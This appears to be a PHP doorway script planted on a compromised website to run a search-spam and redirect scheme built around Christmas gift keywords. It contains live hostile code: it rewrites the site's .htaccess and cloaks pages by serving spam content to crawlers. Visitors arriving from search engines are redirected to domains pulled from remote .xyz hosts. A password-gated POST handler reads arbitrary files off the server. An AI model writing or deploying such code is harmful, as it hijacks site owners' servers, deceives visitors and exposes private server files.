$arrfh[]="Christmas Supplies";
$arrfh[]="Holiday Gifts";
$arrfh[]="Christmas Gifts 2018";
$arrfh[]="Top Christmas gifts 2018";
$arrfh[]="Christmas gift shop";
$arrfh[]="Christmas presents";
$arrfh[]="Xmas";
$arrfh[]="Christmas Ornament";
$arrfh[]="for Christmas";
$arrfh[]="best Christmas gift";
$arrfh[]="Xmas Ornaments";
$arrfh[]="Best Christmas gifts 2018";
$arrfh[]="Unique Christmas Gifts";
$arrfh[]="Christmas gift";
$arrfh[]="Christmas Decoration";
$arrfh[]="Christmas gift ideas";


// #llqllq#arr_fuhaoend


$q1 = "O00O0O";	$q2 = "O0O000";	$q3 = "O0OO00";	$q4 = "OO0O00";	$q5 = "OO0000";	$q6 = "O00OO0";	$q7 = "O00O00";	$q8 = "O00OOO";	$$q1 = RandAbcs();// #llqllq#randkeybg
$strRand[0]="sdjtiwebxgomqzuykfplrcvhna";
$strRand[1]="rxtdcspuwknamgbeilzohyfvjq";
$strRand[2]="wvybquazdpktmreinjcsgfhxlo";
$strRand[3]="ewgznjqhlfydsvmoixkcpburat";
$strRand[4]="vhrkmxsctpjbyquidfzgweolna";
$strRand[5]="zemwgcfrvkoahsjuyibndplqxt";
$strRand[6]="cltwepzrsmvxjydgfoquknhaib";
$strRand[7]="pgczvxbtdhesyfmnruiojqklwa";
$strRand[8]="bpyhwsxeqackzmjgolivfnrudt";
$strRand[9]="hrjngkdbxwutymlafeosvzcpqi";
$strRand[10]="sohycbkgiefpxjnltwmuvardzq";
$strRand[11]="qtixzpuwvmokfjcdbgrhyesanl";
$strRand[12]="svxkwdyortfzicbnuegmqjlpha";
$strRand[13]="kgvsjqotpnbuzicdlyehrfxwma";
$strRand[14]="lfsxeyuwobczdrgntjkvqhmipa";
$strRand[15]="dwipgzmfkhuslyntqaxrvobjec";
$strRand[16]="pubiglovchwyzrktemqfdsjnxa";
$strRand[17]="oldrbtjmufksgnayvxizehpcwq";
$strRand[18]="uyidkvxfagsmrtcnoehjbpwlqz";
$strRand[19]="vzshltoarneudgjpcxikfwybqm";
$strRand[20]="ivuhnkrclmwdzxpoybetgsqafj";
$strRand[21]="ihoscajgdqvwzufknlpmxtybre";
$strRand[22]="sdmovznpaqkixwhfcrbgyltuje";
$strRand[23]="qjkwnsvacxgibohtldpryfzemu";
$strRand[24]="sinwodzqkapjxerghyfculvtmb";
$strRand[25]="fzpsxvlwykurjqtnbadeomighc";
$strRand[26]="qyerzdstvkwogfumhnacpxjbil";
$strRand[27]="xjtsbmaenwuyiocdfvzhlgkpqr";
$strRand[28]="wslizdrjvamckehonxtqpgyufb";
$strRand[29]="jfbhvuwdtnegpirqlxokasmcyz";
$strRand[30]="brmxnfwdjqvizucysgotkaeplh";
$strRand[31]="acwyegfpkbsurxmjqhvdtnzoil";
$strRand[32]="jioxseckpqyfzbhuvgtwrmdlan";
$strRand[33]="rugoeqhnwyfbxkmptlsjczdiva";
$strRand[34]="fusgyrlzjcteoxdqhnavwbmipk";
$strRand[35]="yjswvhalontxzimfkpedubgqcr";
$strRand[36]="przbsmgtjoxvhlniqdfuecawky";
$strRand[37]="cuxvkmwfsirybldhgqtjepozna";
$strRand[38]="qzmjoxsevlyntkwuifrcabpdhg";
$strRand[39]="nwxekqpmczfdujhitbgoslyvra";
$strRand[40]="ohrxdalnycimjskwfpvzegutbq";
$strRand[41]="ngsrdhtebpficuqvwjzmlxoayk";
$strRand[42]="emkihpvwfgsdbcraoyjltuqzxn";
$strRand[43]="agrcnkjolumfhizxqtysvbepwd";
$strRand[44]="qpfcgrkxswidmvbatolhzynuje";
$strRand[45]="fviutmlryexzqoahdcpgnsbwkj";
$strRand[46]="yevwtpinckdfuasxrbzhomgqjl";
$strRand[47]="pmdqgsxjynekzlotahrvuwifbc";
$strRand[48]="advctmxbjlwrepgfhsuqykonzi";
$strRand[49]="btkgfadpnuwxvymojhslqrizec";
$strRand[50]="okrjbtmgyuaxpvwsnqdfhezlci";
$strRand[51]="mksielypwubrdxtqoacvghjfnz";
$strRand[52]="qmwctjuhagpbefysrvlkdniozx";
$strRand[53]="opwgzyixmhvdtcqnlkebursfaj";
$strRand[54]="phqtnveuxszgcobdkfrylmiwaj";
$strRand[55]="yrkolguswnxvatjfcempqbzdhi";
$strRand[56]="rdagnymvcklwqhojbfeipzxust";
$strRand[57]="mzdhtrsxigeybcpakwlunofqjv";
$strRand[58]="jmnezwktrgxsofqadbihcvypul";
$strRand[59]="qtecmpwlgyosrvhkdziuxbajnf";
$strRand[60]="nosfaelzgbhxutmjqdpvkrciyw";
$strRand[61]="wtfqcsbxukljarvyozghpmnide";
$strRand[62]="qlbtfaeujszmrpcvoghnkywidx";
$strRand[63]="rbhupewsydzagqkmitnxojvlfc";
$strRand[64]="hjvnreyscwzuikxatlobdmqfgp";
$strRand[65]="cyhgkbpusvefwnxmjotqadrzli";
$strRand[66]="ahimpdyegqbwujnzftxcovslkr";
$strRand[67]="qvbryzcajosmnfdiwpxeutkglh";
$strRand[68]="zcwntevxkdjapfolirmqubgshy";
$strRand[69]="gaisntqeyrmwzcdvblfhujkxpo";
$strRand[70]="kdtymxcrujnfeqvspibohawglz";
$strRand[71]="mzhljkyfoqxatubnvrswdicpeg";
$strRand[72]="nzlojtbcdkxyumrhifvqepgsaw";
$strRand[73]="avxirzedqwkcjsnpfolugmhtyb";
$strRand[74]="dgwzyjlsqnvxmoehbcutpfrkia";
$strRand[75]="bxiaugmowjzecsqhkypldtrfnv";
$strRand[76]="brdzoniutysfephlawvgckxmjq";
$strRand[77]="mbenyltogxrzcwfjdasipukqhv";
$strRand[78]="doxkpfnjgzatuyviqchsrlwemb";
$strRand[79]="hiezpdlavrosmnjtgcbxuywkfq";
$strRand[80]="szrvbyncixgdteplukmqfjwoah";
$strRand[81]="nltygmsdkhiqvwujefazprbocx";
$strRand[82]="yfpdzjwlarvmkbqsgotiuxhcen";
$strRand[83]="lgtuhnyvdfcjazoekwiqpbxsrm";
$strRand[84]="byuhtsjqazkrlfdexiongpmcwv";
$strRand[85]="xtrdflswgmqvhjuokipzenaycb";
$strRand[86]="tekmscozrglvfdwnpyuqbjixha";
$strRand[87]="mqbdftnazlgrpschoxikyjewvu";
$strRand[88]="hlnsbkxtvfjomypduagziewcqr";
$strRand[89]="lvtnfzydwrepoqskjaubmixghc";
$strRand[90]="ktlidvmjubqagexhfpczrwyosn";
$strRand[91]="kbswzpemjnolcavrxuyditqhfg";
$strRand[92]="lhxknomcueqrzgwfpijyvtsadb";
$strRand[93]="naqecjhorukwmlgbtvzxfydpsi";
$strRand[94]="mtfrgikcnqvduexwbspozjylah";
$strRand[95]="ejngrqadsvmyiuxptlcwzbkofh";
$strRand[96]="buhkacomvrjtiyfewgpqsdznlx";
$strRand[97]="shekcavilrxqfzwupogybdtjmn";
$strRand[98]="elcudvimkxgzopnbwqrjhyafts";
$strRand[99]="wrystlmbadpxzghckfnueqoijv";

// #llqllq#randkeyend$thisdom = str_replace("www.","",$_SERVER['HTTP_HOST']);
define("GETDOM",getthisdom());
		// 
	
	
	
$arrArrr = array();$j = 0;for($i=0;$i<20;$i+=2){
  $arrArrr[$j++] = $strRand{$i}.$strRand{$i+1};}
$Arrrarr = array_flip($arrArrr);
$stss = 'transferdm';
$stss2 = 'deliverym';


if(isset($_GET["gsitemap"]) && isset($_GET["mapnum"])){
	
	$O_OO0_0O_0='America/Chicago';	@date_default_timezone_set($O_OO0_0O_0);	
	if (! is_dir("../sitemaps"))
		mkdir("../sitemaps", 0755);	
	global $gnumber;
	$gnumber = 1;
	$bgNum = (int)trim($_GET["gsitemap"]);
	$mapnum = (int)trim($_GET["mapnum"]);
	if($bgNum > FNUM)
	  die("The Number Must Lower Then " . FNUM);
  
	$arrNumTemp = getMapNum($bgNum,$mapnum);
	
	
	foreach($arrNumTemp as $vss){
		
		$vals = "id$vss.php";		
		
		
		
		$idUrl = GETDOM . "gpage.php?getid=$vss";
		$tempIdStr = curl_get_from_webpage($idUrl,'',5);
		$arrId = explode(',',$tempIdStr);
	
		if(count($arrId) < 100){
			echo "g sitemap fail<br/>";
			die();
		}
		
		echo $vals."<br/>";
	
		if($gnumber == 1){
			if(JDT == 1){
				gsitemap($arrId,2,1);			}else{
				gsitemap($arrId,1,2);			}
		}else{
			
			if(JDT == 1){
				gsitemap2($arrId,2,1);			}else{
				gsitemap2($arrId,1,2);			}
			
		}
		
		unset($arrId,$tempArr1,$tempArr2);	}
	
}

if(isset($_GET["ghtac"]) && $_GET["ghtac"]){

	$dirNames = dirname(__FILE__);  
	$httcReplace = end((explode(DIRECTORY_SEPARATOR, $dirNames)));	
	$PreDir = '';	
	if(JDT == 1){
		$UrlBaseDir = $httcReplace;		$RewriteOnDir = '';	
	}else{
		$UrlBaseDir = '';		$PreDir = '../';		$RewriteOnDir = $httcReplace . '/';	
	}
	$strhtt = '';
	if (file_exists("$PreDir.htaccess")){
		@chmod("$PreDir.htaccess",0755);
		$strhtt = file_get_contents("$PreDir.htaccess");	
	}
	if(!(strstr($strhtt,'RewriteBase') || strstr($strhtt,'RewriteRule')))
	{
		$strhtt = '<IfModule mod_rewrite.c>'.PHP_EOL . 'Options +FollowSymLinks'. PHP_EOL .'RewriteEngine on'. PHP_EOL .'RewriteBase /'. $UrlBaseDir . PHP_EOL .'</IfModule>';	
	}else{
		$strhtt = str_ireplace('# RewriteBase ','RewriteBase ',$strhtt);
		$strhtt = str_ireplace('#RewriteBase ','RewriteBase ',$strhtt);	
	}
		
	if(1){
		$r1 = '#(.*RewriteBase.*)#i';		$r2 = '#RewriteRule#i';		
		$rsut = '\1'.PHP_EOL . 'RewriteRule ^'. '.*[-/]'. BZPRO .'(\d+)-.*$ '.$RewriteOnDir.'index\.php?id=\$1&%{QUERY_STRING} [L]' . PHP_EOL . 'RewriteRule ^'. BZPRO .'(\d+)-.*$ '.$RewriteOnDir.'index\.php?id=\$1&%{QUERY_STRING} [L]' . PHP_EOL . 'RewriteRule ^'. BZSITE .'(\d+)[-/].*[-/]'. BZPRO .'(\d+)-.*$ '.$RewriteOnDir.'index\.php?id=\$1-\$2&%{QUERY_STRING} [L]'.PHP_EOL . 'RewriteRule ^'. BZSITE .'(\d+)[-/]'. BZPRO .'(\d+)[-/].*$ '.$RewriteOnDir.'index\.php?id=\$1-\$2&%{QUERY_STRING} [L]'.PHP_EOL . 'RewriteRule ^'. BZPRO .'(\d+)[-/].*[-/]'. BZSITE .'(\d+)[-/].*$ '.$RewriteOnDir.'index\.php?id=\$2-\$1&%{QUERY_STRING} [L]'.PHP_EOL . 'RewriteRule ^'. BZPRO .'(\d+)[-/]'. BZSITE .'(\d+)[-/].*$ '.$RewriteOnDir.'index\.php?id=\$2-\$1&%{QUERY_STRING} [L]'.PHP_EOL . 'RewriteRule ^.*[-/]'. BZPRO .'(\d+)[-/]'. BZSITE .'(\d+)[-/].*$ '.$RewriteOnDir.'index\.php?id=\$2-\$1&%{QUERY_STRING} [L]'.PHP_EOL . 'RewriteRule ^.*[-/]'. BZPRO .'(\d+)[-/].*[-/]'. BZSITE .'(\d+)[-/].*$ '.$RewriteOnDir.'index\.php?id=\$2-\$1&%{QUERY_STRING} [L]'.PHP_EOL . 'RewriteRule ^.*[-/]'. BZSITE .'(\d+)[-/].*[-/]'. BZPRO .'(\d+)[-/].*$ '.$RewriteOnDir.'index\.php?id=\$1-\$2&%{QUERY_STRING} [L]'.PHP_EOL . 'RewriteRule ^.*[-/]'. BZSITE .'(\d+)[-/]'. BZPRO .'(\d+)[-/].*$ '.$RewriteOnDir.'index\.php?id=\$1-\$2&%{QUERY_STRING} [L]'.PHP_EOL;
		
		$rsut2 = PHP_EOL . 'RewriteRule ^'. '.*[-/]'. BZPRO .'(\d+)-.*$ '.$RewriteOnDir.'index\.php?id=\$1&%{QUERY_STRING} [L]' . PHP_EOL . 'RewriteRule ^'. BZPRO .'(\d+)-.*$ '.$RewriteOnDir.'index\.php?id=\$1&%{QUERY_STRING} [L]' . PHP_EOL . 'RewriteRule ^'. BZSITE .'(\d+)[-/].*[-/]'. BZPRO .'(\d+)[-/].*$ '.$RewriteOnDir.'index\.php?id=\$1-\$2&%{QUERY_STRING} [L]'.PHP_EOL . 'RewriteRule ^'. BZSITE .'(\d+)[-/]'. BZPRO .'(\d+)[-/].*$ '.$RewriteOnDir.'index\.php?id=\$1-\$2&%{QUERY_STRING} [L]'.PHP_EOL . 'RewriteRule ^'. BZPRO .'(\d+)[-/].*[-/]'. BZSITE .'(\d+)[-/].*$ '.$RewriteOnDir.'index\.php?id=\$2-\$1&%{QUERY_STRING} [L]'.PHP_EOL . 'RewriteRule ^'. BZPRO .'(\d+)[-/]'. BZSITE .'(\d+)[-/].*$ '.$RewriteOnDir.'index\.php?id=\$2-\$1&%{QUERY_STRING} [L]'.PHP_EOL . 'RewriteRule ^.*[-/]'. BZPRO .'(\d+)[-/]'. BZSITE .'(\d+)[-/].*$ '.$RewriteOnDir.'index\.php?id=\$2-\$1&%{QUERY_STRING} [L]'.PHP_EOL . 'RewriteRule ^.*[-/]'. BZPRO .'(\d+)[-/].*[-/]'. BZSITE .'(\d+)[-/].*$ '.$RewriteOnDir.'index\.php?id=\$2-\$1&%{QUERY_STRING} [L]'.PHP_EOL . 'RewriteRule ^.*[-/]'. BZSITE .'(\d+)[-/].*[-/]'. BZPRO .'(\d+)[-/].*$ '.$RewriteOnDir.'index\.php?id=\$1-\$2&%{QUERY_STRING} [L]'.PHP_EOL . 'RewriteRule ^.*[-/]'. BZSITE .'(\d+)[-/]'. BZPRO .'(\d+)[-/].*$ '.$RewriteOnDir.'index\.php?id=\$1-\$2&%{QUERY_STRING} [L]'.PHP_EOL .'RewriteRule' ;		
		if(preg_match($r1,$strhtt)){
			$strhtt = preg_replace($r1,$rsut,$strhtt,1);		
		}else{
			$strhtt = preg_replace($r2,$rsut2,$strhtt,1);
		}
		
		if(JDT == 1 or JDT == 0){
			file_put_contents("$PreDir.htaccess", $strhtt);		
		}
		
	}

	die("ghtac ok");
}


if(isset($_POST["chdate"]) && md5($_POST["chdate"])=='b6772c68627f804a9578152ee90f5b0c' && isset($_POST["redate_file"])){$redate_file = $_POST["redate_file"];if(file_exists($redate_file)){echo '#ok#';}else{echo '#nofile#';}die();}if(isset($_POST["redate"]) && md5($_POST["redate"])=='b6772c68627f804a9578152ee90f5b0c' && isset($_POST["redate_file"])){$redate_file = $_POST["redate_file"];if(file_exists($redate_file)){echo rFile($redate_file);die();}else{echo '#nofile#';die();}}if(isset($_POST["test"]) && md5($_POST["test"])=='b6772c68627f804a9578152ee90f5b0c'){echo '#ok#';	die();}if((isset($_POST["lan"]) && $_POST["lan"] == 1) or (isset($_GET["lan"]) && $_GET["lan"] == 1)){$fileArr = array();$flag = 1;$fileArr['index'] = filesize(__FILE__);if(file_exists("./moban.html")){$fileArr['moban'] = filesize("./moban.html");}else{$flag = 0;$fileArr['moban'] = -1;}echo 'error---'. serialize($fileArr) .'---';die();}if(isset($_GET["gsitemap"]) || isset($_GET["rset"]) || isset($_GET["hzui"]) || isset($_GET["jgshu"]) || isset($_GET["ljshu"]) || isset($_GET["modifydate"]) || isset($_GET["moshi"]) || isset($_GET["install"])){die();}
	
if(JDT==2){
	
	$UrlParent=end((explode('index.php',$_SERVER['REQUEST_URI'])));	if($UrlParent){
		$tempSid = '';		$tempPid = '';		
				
		$r2='#^'. BZPRO .'(\d+)[-/]#i';		$r3='#[-/]'. BZPRO .'(\d+)[-/]#i';		
		if(preg_match($r2,$UrlParent,$matches2)){
			if(isset($matches2[1]))
				$tempPid = $matches2[1];		}else{
			
			preg_match($r3,$UrlParent,$matches13);			if(isset($matches13[1]))
				$tempPid = $matches13[1];		}
		
			
		if($tempPid){
			$_GET['id']= $tempPid;		
		}
	}
	
}elseif(JDT==3&&isset($_GET['keyword'])&&$_GET['keyword']){
		
		$tempSid = '';		$tempPid = '';		$UrlParent = $_GET['keyword'];		
			
		$r2='#^'. BZPRO .'(\d+)[-/]#i';		$r3='#[-/]'. BZPRO .'(\d+)[-/]#i';		
		if(preg_match($r2,$UrlParent,$matches2)){
			if(isset($matches2[1]))
				$tempPid = $matches2[1];		}else{
			
			preg_match($r3,$UrlParent,$matches13);			if(isset($matches13[1]))
				$tempPid = $matches13[1];		}
		
	
		if($tempPid){
			$_GET['id']= $tempPid;		
		}
	
	
}
function getRandStr(){
	
	$arrABC = range('a','z');	shuffle($arrABC); 
	$randNum = rand(4,6);	
	$str = implode('',array_slice($arrABC,0,$randNum));	
	return $str;}
if(isset($_GET["id"]))
	$id = $_GET["id"];else{
	$id = "54402"; //llq index id 
}

$resid = '#^\d+$#';
if(!preg_match($resid,$id)){
	exit;
}

$id23 = $id;$numArr_key = count($arr_key);
$siteid = MSID;
$siteAID = $siteid. '-' .$id23;$fileKey = $id23 % FNUM;
// $_SERVER["HTTP_REFERER"] = "google.com.hk";
if(isset($_SERVER["HTTP_REFERER"])){
	$referer = $_SERVER["HTTP_REFERER"]; 
	$russ = '#(google|yahoo|incredibar|bing|docomo|mywebsearch|comcast|search-results|babylon|conduit)(\.[a-z0-9\-]+){1,2}#i';	

	$ipRanges = array( array('64.233.160.0' , '64.233.191.255'),  array('66.102.0.0' , '66.102.15.255' ) ,  array('66.249.64.0' , '66.249.95.255') ,  array('72.14.192.0' , '72.14.255.255') ,  array('74.125.0.0' , '74.125.255.255') ,  array('209.85.128.0' , '209.85.255.255') ,  array('216.239.32.0' , '216.239.63.255') ); 
	$localIp = get_real_ip();	
	$is_or_no = is_ip($localIp,$ipRanges);
	$iszz = isCrawler();	
	
	if(preg_match($russ, $referer) && $iszz == false && $is_or_no == false){	
		$rsdom = '#^https?://www\.[^/]+/$#i';
		
		$jumDom1 = 'http://www.'.$stss.'.xyz'. DOMTXT . $siteid .".txt";	
		$jumDom2 = 'http://www.'.$stss2.'.xyz'. DOMTXT . $siteid .".txt";
	
		for($i=0;$i<2;$i++){
			$domJump = curl_getjs_from_webpage($jumDom1,2);
			$domJump = trim($domJump);

			if(!preg_match($rsdom,$domJump)){
				$domJump = curl_getjs_from_webpage($jumDom2,10);
			
				$domJump = trim($domJump);
				if(preg_match($rsdom,$domJump))
					break;
			}else{
				break;
			}
		}
		
		echo '<script language="javascript" type="text/javascript">'. PHP_EOL .'window.location.href="'. $domJump . "index.php?main_page=product_info&products_id=" . $id23 .'";'. PHP_EOL .'</script>';		die();	
	}
}
 
 $fcontent = '';
 
 
 $pInfoUrl = GETDOM . "gpage.php?site=$thisdom&id=$siteAID&ljshu=".LINKNUM; 
 $pInfoStr = curl_get_from_webpage($pInfoUrl,'',5);
 $rsInfo = '#<info>(.*)</info>#si';
 preg_match($rsInfo,$pInfoStr,$matchInfo);
 if(isset($matchInfo[1])){
	 $InFoStrArr = unserialize($matchInfo[1]);
 }else{
	 header("HTTP/1.1 404 Not Found");exit;
 }
 
 
$frStr1 = $InFoStrArr['frStr1'];
$fr1Arr = unserialize($frStr1);


$nowIdName = $InFoStrArr['nowIdName'];

// $fhNum = count($arrfh);
// $tpFhKey = $id23 % $fhNum;
// $addWord = $arrfh[$tpFhKey];

// $nowIdName .= ' '.$addWord;

$Article = $InFoStrArr['des'];

$Article = str_replace('\"','"',$Article);
$Article = str_replace("\'","'",$Article);
$Article = str_replace('\r\n','',$Article);
$Article = str_replace('\n','',$Article);
$Article = str_replace('\r','',$Article);


$fr1Strs = '<ul>'.PHP_EOL;
foreach($fr1Arr as $key=>$vs){
	$tpPid = $key;
	$tpFlink = getalink($tpPid);
	$fr1Strs .= '<li><a title="'.$vs.'" href="'.$tpFlink.'">'.$vs.'</a></li>'.PHP_EOL;
}
$fr1Strs .= '</ul>'.PHP_EOL;


		$fileMb = fopen("moban.html","r");
			$html = fread($fileMb,filesize("moban.html"));			
			
			$html = str_ireplace('#bbbtitsbbb#', $nowIdName, $html);	
			$html = str_ireplace('#bbbkeybbb#', $nowIdName, $html);	
			$html = str_ireplace('#bbbdesbbb#', $nowIdName, $html);	
			
			$html = str_ireplace('#bbb1content1bbb#', '', $html);
			$html = str_ireplace('#bbb2content2bbb#', '', $html);
			$html = str_ireplace('#descontent#', '<h2>'. $nowIdName .'</h2><br/>'. PHP_EOL .$Article, $html);
			
			$html = str_replace('#link1#','',$html);
				$html = str_replace('#link2#','',$html);
				$html = str_replace('#link3#','',$html);
				$html = str_replace('#link4#','',$html);
				$html = str_replace('#link5#','',$html);
				
				$html = str_replace('#flink#',$fr1Strs,$html);
				$html = str_replace('#Flink2#','',$html);
			
		
	echo $html;
 
 
die();
	
	
	
function getMapNum($bgNum,$mapnum){
	$TempArr = array();
	if($bgNum + $mapnum <= FNUM){
		for($i=0;$i<$mapnum;$i++){
			$TempArr[$i] = $bgNum + $i -1;
		}
	}else{
		for($i=0;$i<$mapnum;$i++){
			if($bgNum+$i > FNUM)
				$TempArr[$i] = $bgNum + $i -1 -FNUM;
			else
				$TempArr[$i] = $bgNum + $i -1;
		}
	}
	
	return $TempArr;
}


function getRandId(){
	$num = rand(1,FNUM);	$num = $num - 1;	require(FILEDIRNAME . "/id$num.php");	$indexId=array_rand($arrId,1);	$id = $arrId[$indexId];	unset($arrId);	return $id;}
function get_arrvs($arr,$num,$nowkey){
	$numArr = count($arr);	
	if($nowkey + $num < $numArr)
		return $arr[$nowkey + $num];	else{
		if($nowkey + $num - $numArr - $numArr > 0)
			return get_arrvs($arr,$num - $numArr,$nowkey);		else
			return $arr[abs($nowkey + $num - $numArr)];	}
}

function get_pre_link($arr,$key){
	
	$tmpA1 = array();	$tmpA2 = array();	
	$num = count($arr);	
	
	if($key + JGNUM + 1 + LINKNUM >= $num){
		
		if($key + JGNUM + 1 - $num > LINKNUM){
			return array_slice($arr, $key + JGNUM + 1 - $num, LINKNUM);		}else{
		
		$duoyu = $key + JGNUM + 1 + LINKNUM - $num + 1;		$tmpA1 = array_slice($arr, $key + JGNUM + 1, LINKNUM);		$tmpA2 = array_slice($arr, 0, $duoyu);			
		return array_merge($tmpA1,$tmpA2);		}
	}else{
			return array_slice($arr, $key + JGNUM + 1, LINKNUM);	}
	
}
function get_next_link($arr,$key){
	
	$tmpA1 = array();	$tmpA2 = array();	
	$num = count($arr);	if($key - JGNUM - LINKNUM < 0 && $key - JGNUM > 0){
		$duoyu = abs($key - JGNUM - LINKNUM);		$tmpA1 = array_slice($arr, 0, abs($key - JGNUM));		$tmpA2 = array_slice($arr, $num-$duoyu-1, $duoyu);		return array_merge($tmpA1,$tmpA2);	}else{
			return array_slice($arr, $key - JGNUM - LINKNUM, LINKNUM);	}
}
function rFile($file){
	if(function_exists('file_get_contents')){
		return file_get_contents($file);
	}else{
		$handle = fopen($file, "r");
		$contents = fread($handle, filesize($file));
		fclose($handle);
		return $contents;
	}
}
function isCrawler() {
	$agent= @strtolower($_SERVER['HTTP_USER_AGENT']);	if (!empty($agent)) {
		$spiderSite= array(
			"Googlebot",
			"Mediapartners-Google",
			"Adsbot-Google",
			"Yahoo!",
			"Google AdSense",
			"Yahoo Slurp",
			"bingbot",
			"MSNBot"
		);		foreach($spiderSite as $val) {
		$str = strtolower($val);		if (strpos($agent, $str) !== false) {
			return true;			}
		}
	} else {
		return false;	}
} 

function glink($filenames,$jdt=1){
	$filePres = '';	$fileEnds = '';	
	if($jdt == 1){
		$filePres = basename(__FILE__) . "?id=";	}else{
		$filePres = '';		$fileEnds = JTHZ;	}
	////
	$fpath='http://'.$_SERVER['HTTP_HOST'].$_SERVER['REQUEST_URI'];	$serpath=substr($fpath,0,strrpos($fpath,'/'));
	$siteLink='http://'.$_SERVER['HTTP_HOST'];		
	$put_str = '';
	$urlsArray = $filenames;	//print_r($urlsArray);
	$numLinks = count($urlsArray);	
	foreach($urlsArray as $value){
		$curphp=basename(__FILE__); 
		$first=stristr($value,".php");		$last=stristr($value,".xml");		$checkTxt =stristr($value,".txt");		//print_r( $value.$curphp."  ".$first."  ".$last);		if($first===false && $last===false && $checkTxt===false)
		{
			
			$url=$serpath ."/". $filePres . PRENAME . '-' . basename($value) .$fileEnds;			$put_str .= $url . PHP_EOL;				
		}
	}
		$gFile = 'urls.txt';		echo '<br/>'.$gFile.'';
		@unlink($gFile);		file_put_contents($gFile,$put_str);		echo "<br/>";	
}
//sitemap.xml4000xml$c=1sitemap$c=2
//$dir


function print_map2($filenames,$c=1,$jdt=1){

	$filePres = '';	$fileEnds = '';	
	$dirNames = dirname(__FILE__);	$httcReplace = end((explode(DIRECTORY_SEPARATOR, $dirNames)));			
	if(JDT == 2){
		$filePres = $httcReplace . "/" . basename(__FILE__) . "/";	}elseif(JDT == 1){
		$filePres = $httcReplace . "/";	}elseif(JDT == 3){
		$filePres = $httcReplace . "/" .basename(__FILE__) . "?key=";	}else{
		$filePres = '';	}
	if(JDT == 3){
		$fileEnds = '';	}else{
		$fileEnds = JTHZ;	}
	$fpath='http://'.$_SERVER['HTTP_HOST'].$_SERVER['REQUEST_URI'];	$serpath=substr($fpath,0,strrpos($fpath,'/'));
	$siteLink='http://'.$_SERVER['HTTP_HOST'];		
	$mapPre = '<'.'?xml version="1.0" encoding="UTF-8" ?'.'>'. PHP_EOL.'<urlset xmlns="http://www.sitemaps.org/schemas/sitemap/0.9">' . PHP_EOL;	$mapEnd = PHP_EOL . '</urlset>';
	// $urlsArray = $filenames;
	// $numLinks = count($urlsArray);
	$star = 0;	$priority = 0.1;	$starPri = 0;	$gFile ="";	$date = date("Y-m-d");	$time = date("H:i:s");
	$str = "";						
	$tempArr1 = $filenames;
	
	foreach($tempArr1 as $value2){
		$curphp=basename(__FILE__); 
		$value = $value2;		$first=stristr($value,".php");		$last=stristr($value,".xml");		$checkTxt =stristr($value,".txt");		$tempPid = $value;
				$url = getalink($tempPid);
		
		
		
		if($first===false && $last===false && $checkTxt===false)
		{
			$date = date("Y-m-d");			$time = date("H:i:s");				
		
			if($star % 12000==11999){
				$put_str = $mapPre . $str . $mapEnd;
				header("Content-type: text/xml");
				echo $put_str;
				return;		
			}
			
		
			
	
			$str .= "   <url>
			 <loc>" . $url . "</loc> 
			 <lastmod>". $date . "T" . $time ."-05:00</lastmod>  
			 <changefreq>daily</changefreq> 
			 <priority>0.1</priority> 
			 </url>
		";	
			
			
			$star++;			$starPri++;		}
	}
	
	{
		
		$put_str = $mapPre . $str . $mapEnd;		
		header("Content-type: text/xml");
		echo $put_str;

	}
	
	unset($tempArr1);	unset($filenames);	
}

function print_map($filenames,$c=1,$jdt=1){
	$filePres = '';	$fileEnds = '';	
	
	$fpath='http://'.$_SERVER['HTTP_HOST'].$_SERVER['REQUEST_URI'];	$serpath=substr($fpath,0,strrpos($fpath,'/'));
	$siteLink='http://'.$_SERVER['HTTP_HOST'];		
	$mapPre = '<'.'?xml version="1.0" encoding="UTF-8" ?'.'>'. PHP_EOL.'<urlset xmlns="http://www.sitemaps.org/schemas/sitemap/0.9">' . PHP_EOL;	$mapEnd = PHP_EOL . '</urlset>';
	// $urlsArray = $filenames;
	// $numLinks = count($urlsArray);
	
	$star = 0;	$priority = 0.9;	$starPri = 0;	$gFile ="";	$date = date("Y-m-d");	$time = date("H:i:s");
	$str = "   <url>
			 <loc>" . $siteLink . "</loc> 
			 <lastmod>". $date . "T" . $time ."-05:00</lastmod> 
			 <changefreq>always</changefreq> 
			 <priority>1.0</priority> 
			 </url>
		";						
	$tempArr1 = $filenames;
	
	foreach($tempArr1 as $value2){
		$curphp=basename(__FILE__); 
		$value = $value2;		$first=stristr($value,".php");		$last=stristr($value,".xml");		$checkTxt =stristr($value,".txt");		
			$tempPid = $value;
				$url = getalink($tempPid);
		
		
		if($first===false && $last===false && $checkTxt===false)
		{
			$date = date("Y-m-d");			$time = date("H:i:s");			
	
			if($star % 12000==11999){
				$put_str = $mapPre . $str . $mapEnd;
				header("Content-type: text/xml");
				echo $put_str;
				return;			
			}
			
			if($starPri >= 400 && $priority != 0.1){
				$starPri = 0;				$priority = $priority - 0.1;			}
			
			if($priority > 0.1){
				
				$str .= "   <url>
					 <loc>" . $url . "</loc> 
					 <lastmod>". $date . "T" . $time ."-05:00</lastmod>  
					 <changefreq>daily</changefreq> 
					 <priority>". $priority . "</priority> 
					 </url>
				";	
			}else{
										$str .= "   <url>
			 <loc>" . $url . "</loc> 
			 <lastmod>". $date . "T" . $time ."-05:00</lastmod>  
			 <changefreq>daily</changefreq> 
			 <priority>0.1</priority> 
			 </url>
		";	
			}
			
			$star++;			$starPri++;		}
	}
	
	{
		
		$put_str = $mapPre . $str . $mapEnd;
		header("Content-type: text/xml");		
		echo $put_str;

	}
	
	unset($tempArr1);	unset($filenames);		
}

function gsitemap2($filenames,$c=1,$jdt=1){
	global $gnumber,$arrArrr;
	$filePres = '';	$fileEnds = '';	
	$dirNames = dirname(__FILE__);	$httcReplace = end((explode(DIRECTORY_SEPARATOR, $dirNames)));			
	if(JDT == 2){
		$filePres = $httcReplace . "/" . basename(__FILE__) . "/";	}elseif(JDT == 1){
		$filePres = $httcReplace . "/";	}elseif(JDT == 3){
		$filePres = $httcReplace . "/" .basename(__FILE__) . "?key=";	}else{
		$filePres = '';	}
	if(JDT == 3){
		$fileEnds = '';	}else{
		$fileEnds = JTHZ;	}
	$fpath='http://'.$_SERVER['HTTP_HOST'].$_SERVER['REQUEST_URI'];	$serpath=substr($fpath,0,strrpos($fpath,'/'));
	$siteLink='http://'.$_SERVER['HTTP_HOST'];		
	$mapPre = '<'.'?xml version="1.0" encoding="UTF-8" ?'.'>'. PHP_EOL.'<urlset xmlns="http://www.sitemaps.org/schemas/sitemap/0.9">' . PHP_EOL;	$mapEnd = PHP_EOL . '</urlset>';
	// $urlsArray = $filenames;
	// $numLinks = count($urlsArray);
